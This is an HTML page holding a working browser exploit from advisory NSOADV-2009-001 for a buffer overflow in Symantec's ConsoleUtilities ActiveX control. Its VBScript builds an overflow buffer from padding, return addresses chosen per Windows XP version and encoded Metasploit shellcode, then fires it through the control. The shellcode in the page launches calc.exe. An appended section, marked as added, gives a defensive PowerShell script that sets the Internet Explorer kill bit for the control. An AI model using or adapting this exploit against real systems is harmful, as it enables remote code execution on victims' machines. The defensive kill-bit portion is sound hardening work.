<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'></object>
<script language='vbscript'>
Sub Submit_OnClick
  ' Pick the return address selected in the form below
  For i=0 to 2
    If document.ret.os(i).checked Then
      target=document.ret.os(i).value
    End If
  Next
  EIP=unescape(target)
  arg1 = ""
  arg3 = ""
  arg4 = ""
  arg5 = ""
  junk=String(310, "A") 'junk
  morejunk=String(18, unescape("%u0041")) 'more junk
  ' windows/exec - 224 bytes
  ' http://www.metasploit.com
  ' Encoder: x86/call4_dword_xor
  ' EXITFUNC=seh, CMD=calc.exe
  code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"& _
  "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"& _
  "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"& _
  "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"& _
  "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"& _
  "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"& _
  "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"& _
  "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"& _
  "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"& _
  "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"& _
  "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"& _
  "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"& _
  "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"& _
  "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")
  buf=junk+EIP+morejunk+break+code
  obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer Overflow PoC</h2>
Use it only for education or ethical pentesting!
The author accepts no liability for damage caused by this tool.<br>
Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>
<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
----------------------------------------------------------------
<form name="ret">
<input type=radio name="os" value="%u4141%u4141"> DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5"> Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68"> Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>
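Defensive counterpart, added here and not part of the original advisory or PoC: a PowerShell snippet that sets the Internet Explorer kill bit for the ConsoleUtilities control, using the CLSID from the object tag above, so the browser refuses to instantiate it. It assumes an elevated session (HKLM writes); the registry path and the 0x400 flag are the standard kill-bit mechanism, and the Wow6432Node branch is only touched where it exists.

```powershell
# Added example (not from the NSOADV-2009-001 PoC): kill-bit the vulnerable control.
# CLSID taken from the <object> tag on this page.
$Clsid   = '{B44D252D-98FC-4D5C-948C-BE868392A004}'
$KillBit = 0x400   # COMPAT_EVIL_DONT_LOAD: IE will not load the control

$Paths = @(
  'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
  'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-ActiveXKillBit {
    param([string]$Base, [string]$Id)
    $key = Join-Path $Base $Id
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    # OR the kill bit into any flags already present instead of overwriting them.
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' `
                     -Value ($current -bor $KillBit) -Type DWord
}

function Test-ActiveXKillBit {
    param([string]$Base, [string]$Id)
    $key = Join-Path $Base $Id
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
}

foreach ($p in $Paths) {
    if (Test-Path $p) {   # Wow6432Node exists only on 64-bit Windows
        Set-ActiveXKillBit -Base $p -Id $Clsid
        '{0}: kill bit set = {1}' -f $p, (Test-ActiveXKillBit -Base $p -Id $Clsid)
    }
}
```

The check function is separate so it can be run on its own from an inventory script to confirm the bit is present on every host.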